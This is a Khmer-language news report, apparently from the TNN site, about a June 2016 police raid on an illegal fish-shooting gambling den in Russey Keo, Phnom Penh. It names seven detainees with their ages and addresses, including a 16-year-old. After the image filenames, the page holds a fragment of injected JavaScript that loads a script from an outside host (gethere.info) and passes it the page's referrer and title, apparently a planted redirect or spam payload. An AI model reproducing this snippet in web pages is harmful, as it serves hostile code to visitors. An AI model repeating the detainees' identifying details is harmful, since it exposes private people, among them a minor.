ព្រឹតិ្តការណ៍ថ្មីៗ

ស្នូរគ្រាប់ភ្លៀងមិនទាន់ដាច់ សមត្ថកិច្ចខណ្ឌឬស្សីកែវបង្ក្រាបទីតាំងល្បែងឃាត់បានមនុស្សជាច្រើននាក់(video)

3 ឆ្នាំ មុន 1 tnn_admin

 

ភ្នំពេញ ៖ សេចក្តីរាយការណ៏ពីភ្នាក់ងារបណ្តាញព័ត៌មាន TNN បានអោយដឹងថា ខណ:ដែលមេឃកំពុងភ្លៀង កម្លាំងព្រហ្មទណ្ឌខណ្ឌឬស្សីកែវដឹកនាំដោយនាយរងផ្នែកលោក ម៉ៅ  ចាន់ថុន បានចុះបង្ក្រាបទីតាំងល្បែងហ្គេមបាញ់ត្រី ខុសច្បាប់មួយកន្លែង ឃាត់បានមនុស្ស៧នាក់  កាលពីវេលាម៉ោង១និង៥០នាទី រសៀលថ្ងៃទី៣០ ខែមិថុនា ឆ្នាំ២០១៦នេះ នៅចំណុចផ្ទះជួលមួយកន្លែង តាមផ្លូវបេតុង ក្រុម៩ ក្នុងភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ រាជធានីភ្នំពេញ។

 

លោក ណយ ច័ន្ទណារ័ត្ន មន្ត្រីផ្នែកព្រហ្មទណ្ឌខណ្ឌ ឬស្សី កែវបានអោយដឹងថា  ក្នុងកិច្ចប្រតិបត្តិការបង្រ្កាប បទល្មើសនេះ សមត្ថកិច្ចបាន ដកហូតវត្ថុតាងរួមមានទូរហ្គេមបាញ់ត្រី២ កៅអី៣ និងទឹកប្រាក់មួយចំនួនផងដែរ។

 

លោក ណយ ច័ន្ទណារ័ត្ន បានអោយដឹងទៀតថា នៅក្នុងនោះនារីស្ត្រីម្នាក់ឈ្មោះប៊ូ សុផាន់ណា ភេទស្រី អាយុ៣៣ឆ្នាំ ជាអ្នកដាក់ពង់ត្រី ស្នាក់នៅផ្ទះលេខ០៤៨ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ និងអ្នកលេងចំនួន៦នាក់ទៀត ទី១ ឈ្មោះពេជ្រ សាវុន ភេទប្រុស អាយុ៣១ឆ្នាំ ទី២ លឹម សុផារ៉ា ភេទប្រុស អាយុ២៤ឆ្នាំ ទី៣ នុត សំរង់ ភេទប្រុស អាយុ១៦ឆ្នាំ ទី៤ សៅ រ័ត្នសុគន់ អាយុ១៨ឆ្នាំ ទី៥ឈ្មោះ ង៉ែត ថន ភេទប្រុស អាយុ៣៤ឆ្នាំ ទាំងអស់គ្នាស្នាក់នៅក្នុងភូមិ ទួលសង្កែ សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ និងដោយឡែកម្នាក់ទៀត ឈ្មោះ ហង្ស មុំសុភា ភេទប្រុស អាយុ៣៤ឆ្នាំ ស្នាក់នៅផ្ទះជួល តាមបណ្តោយផ្លូវសីុសុវត្ថិស្ថិតក្នុងសង្កាត់ស្រះចក ខណ្ឌដូនពេញ។

 

ក្រោយប្រតិបត្តិការចប់ជនដែលពាក់ព័ន្ធ នឹងករណីខាងលើត្រូវបានបញ្ជូនខ្លួន ទៅអធិការដ្ឋាននគរបាលខណ្ឌឬស្សីកែវ ដើម្បីធ្វើការសាកសួរបន្ត និងក៏សាងសំណុំរឿង អនុវត្តន៍ចាត់ការទៅតាមនីតិវិធី៕

IMG-20160630-WA0120 IMG-20160630-WA0114 IMG-20160630-WA0109 IMG-20160630-WA0107 IMG-20160630-WA0105 IMG-20160630-WA0104 IMG-20160630-WA0099 IMG-20160630-WA0084 IMG-20160630-WA0079s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!